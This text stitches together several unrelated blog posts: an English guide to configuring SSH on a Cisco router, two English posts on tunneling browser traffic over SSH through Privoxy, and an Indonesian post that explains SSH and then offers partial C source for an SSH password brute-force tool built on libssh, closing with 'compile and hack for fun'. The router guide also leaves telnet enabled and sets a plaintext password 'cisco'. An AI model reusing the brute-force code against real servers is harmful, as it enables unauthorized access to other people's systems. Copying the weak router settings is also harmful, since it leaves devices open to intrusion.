Setting Up SSH on a Cisco Router

In this post I'll demonstrate how to configure SSH on a cisco router.

Below are the commands I used to name the router and provide a domain name. These details are required rior to generating the key. I then generate a 2048 bit RSA key (this took abolut 10 minutes, I should have done 1024). Following the key creation I configure SSH to have a 60 minute timeout, to use SSH version 2 and to exit after 3 failed login attempts. Finally I assign SSH and Telnet (for backup) to my VTY ports and create a user called Bob.

Router>enable

Password:

Router#configure terminal

Enter configuration commands, one per line. End with CNTL/Z.

Router(config)#hostname R1

R1(config)#ip domain-name home.local

R1(config)#crypto key generate rsa general-keys modulus 2048

The name for the keys will be: R1.home.local

% The key modulus size is 2048 bits

% Generating 2048 bit RSA keys, keys will be non-exportable...[OK]

R1(config)#ip ssh time-out 60

R1(config)#ip ssh authentication-retries 3

R1(config)#ip ssh version 2

R1(config)#line vty 0 4

R1(config-line)#transport input ssh telnet

R1(config-line)#exit

R1(config)#aaa new-model

R1(config)#username bob password 0 cisco

R1(config)#exit

I use Putty to connect with SSH and I'm presented with a dialogue to accept the certificate as shown below.

I then log in with my bob credentials.

And a quick packet capture shows me that I am encrypting my traffic with SSH.

SSH Tunneling the Pretty Way

This is just a quick post about a nice little tool I found that allows you to setup and save your SSH tunnels and then quickly bring them up when required. Why might you want to do this? Well theres plenty of reasons. They range from it feels geeky, to you're paranoid about those kids in the coffee shop with the "Hack Naked" stickers on there laptops, to just because you can.

Now this guide does assume that you have a SSH server that you can get too and its running Privoxy on port 8118.

The tool is Gnome SSH Tunnel Manager (gSTM) and is available from http://gstm.sourceforge.net the repositories.

apt-get install gstm

Now, a quick reminder of the manual way:

ssh -NL 8118:localhost:8118 synjunkie@ssh_server_ipaddress

Then point your browsers proxy at localhost:8118

And now the pretty way.

Create The Tunnel

Open gSTM from Applications > Internet Menu, and enter your SSH server details. Click Add to configure the port redirection settings and click OK.



Save the settings by clicking OK.



Now you have a tunnel that is saved for you and can be started by Clicking on the Start Button.


Configure The Browser

Now you need to tell Firefox to use your tunnel. Open Firefox Preferences from the Edit menu in Firefox and amend the network proxy settings.



Now you can safely browse the web

You could make this even more seamless by adding a Firefox extension to allow you to have multiple proxy configurations set up and simply select which one you want using drop down list on the toolbar. Switch Proxy works well for this.


Check The Tunnel

You can test that your traffic is being tunneled by using Netstat, Etherape, TCPDump or a number of other tools. Bellow I have used Netstat.



I can see that I am making connections to local port 8118 and that the only external web traffic is going to my SSH server.

When I used Etherape to check my traffic I saw that DNS was not tunneled so one thing to bear in mind is that if your attacker is using subverting your DNS, The whole tunnel will not work. Which I guess is better than it working and your data being stolen!


See my previous post for more details on tunneling without a GUI

• SSH Tuneling

SSH Tunneling

This is a quick blog post to let my mate Ollie know about a few ways that I use SSH and how it is useful.

Firstly, a SSH client connects to a SSH server, logs in with either a password or certificate and communicates over an encrypted tunnel. The beauty of SSH is that it is also easy to tunnel other types of traffic such as HTTP or VNC over the tunnel. This is useful for the following:

> Secure Administration of a remote server.
> Secure File transfer.
> Securing web traffic over a non-secure wired or wireless network.
> Bypassing of restrictions and filtering imposed on the local network.


Tools

> Privoxy
> SSH
> Screen


Setup

At home I have installed SSH on a server and started the service (/etc/init.d/ssh start) listening on port 22 for SSH traffic. I have set port forwarding up on my firewall to allow traffic to hit the server on this port. Usually I will set up a non-standard port but for the sake of an easy explanation I'll leave it at port 22.

On that server I have also installed pivoxy (apt-get install privoxy), and started it (/etc/init.d/privoxy start). By default, Privoxy binds to 127.0.0.1:8118 , and I have also installed Screen. Screen is a program that allows you to have multiple terminal sessions open at once and leave them running after disconnecting from the SSH server.


Connecting To The Server

From my client I connect to the server by using the following command:

ssh synjunkie@ssh_server_ipaddress


After logging in I can issue commands as if I'm sitting at the server. After connecting I would start Screen by issuing the `screen` command. If I wanted to connect to a previous screen session I would use `screen -r`

You navigate through Screen by issuing commands through key-bindings. A few of the ones I find most useful are:

Ctrl+a c new window
Ctrl+a n next window
Ctrl+a p previous window
Ctrl+a " select window from list
Ctrl+a A set window title
Ctrl+a ? show key bindings/command names
Ctrl+a d detach screen from terminal

Screen is great because you can leave a scan going in one session, irc in another and say a traffic capture in another.


Tunneling Traffic

as well as connecting to the server I might want to tunnel some traffic over SSH to my home server and then back out.

For this I would issue the following command on my client and log in.

ssh -NL 8118:localhost:8118 synjunkie@ssh_server_ipaddress

After setting up the tunnel I would go into the proxy settings on my browser and point them to localhost port 8118.


I hope this illustrates a couple of good uses for SSH.

Apa itu SSH ?

SSH atau secure shell adalah aplikasi pengganti remote login seperti telnet, rsh, dan rlogin semacam dengan vnc atau remote desktop, yang jauh lebih aman. Beda’a ssh digunakan buat meremote komputer secara command line interface (text mode) atau dengan lebih jelas’a seperti bermain dengan command prompt pada operating system windows sehingga kinerja’a tentu akan lebih cepat dan gesit.

Dikembangkan pertamakali oleh OpenBSD project dan kemudian versi rilis p (port) di manage oleh team porting ke sistem operasi lain’a, termasuk sistem operasi Linux. Fungsi utama aplikasi ini adalah untuk mengakses mesin secara remote

Dengan SSH, semua percakapan antara server dan klien di enkripsi. Arti’a, apabila percakapan tersebut disadap, penyadap tidak mungkin memahami isi’a. Bayangkan klo seandai’a lo lagi maintenance server dari jauh, tentu’a dengan account yang punya hak khusus, tanpa sepengetahuan lo, account dan password tersebut disadap orang lain, kemudian server lo diobrak-abrik

Algoritma enkripsi yang didukung oleh SSH di antara’a BlowFish (BRUCE SCHNEIER), Triple DES (Pengembangan dari DES oleh IBM), IDEA (The International Data Encryption Algorithm), dan RSA (The Rivest-Shamir-Adelman). Dengan berbagai metode enkripsi yang didukung oleh SSH, lo bisa mengganti’a dengan cepat klo salah satu algoritma yang lo bikin mengalami gangguan

Gw pikir pasti lo berpikir klo SSH itu ga bisa di crack, klo lo berpikir seperti itu lo salah besar !! ingatlah kawan, bahwa ga ada system yang aman 100%, semua buatan manusia pasti ada kelemahan’a, klo kata temen gw anak surabayahackerlink banyak jalan untuk menuju neraka hei sobat

Kita lakukan dengan teknik brute force, gw harap istilah brute force dan password guessing ga perlu lagi dipermasalahin, bagi yang belom tau apa itu brute force or password guessing silakan cari sendiri pengertian’a di ma²ng google

Bahan yang di perlukan:
1. Rokok sampoerna mild 1 bungkus
2. Teh Botol 1 krat
3. Snack and music player, buat cemilan klo lagi stuck
4. Dictionary attack, download aja di situs² hacker
5. Komputer pasti’a, lah klo gada ini mo cracking pake kompor?
6. libssh.h silakan cari lagi di ma²ng google

sedikit source code dari libssh.h buat contoh aja :

#define AUTH_SUCCESS 0

/* in client.c */

SSH_SESSION *ssh_connect(SSH_OPTIONS *options);
void ssh_disconnect(SSH_SESSION *session);

/* in options.c */

SSH_OPTIONS *ssh_getopt(int *argcptr, char **argv);
void options_set_username(SSH_OPTIONS *opt,char *username);
void options_set_host(SSH_OPTIONS *opt, const char *host);
void options_set_port(SSH_OPTIONS *opt, unsigned int port);

/* in auth.c */

int ssh_userauth_password(SSH_SESSION *session,char *username,char *password);

sisa’a compile sendiri pk gcc dan cari sendiri file libssh.h dan file² *.c yang dibutuhin. Sekarang tinggal mengimplementasikan fungsi² diatas pada ssh brute force yang bakal kita rakit code’a

#include
#include
#define PORT 22

void checkauth(char *user, char *password, char *host)
{
SSH_SESSION *session;
SSH_OPTIONS *options;
int argc=1;
char *argv[]={”none”};

options=ssh_getopt(&argc,argv);
options_set_username(options,user);
options_set_host(options,host);
options_set_port(options,PORT);
session=ssh_connect(options);
if(!session) return ;

if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS)
{
printf(”%s:%s:%s -> BaD Password\n”,user,password,host);
ssh_disconnect(session);
return;
}else{
printf(”%sManteb juragan.Coba ini : %s:%s:%s\n”,warn,user,password,host);
}
}

Let’s compile and hack for fun !!

Source code from kecoak team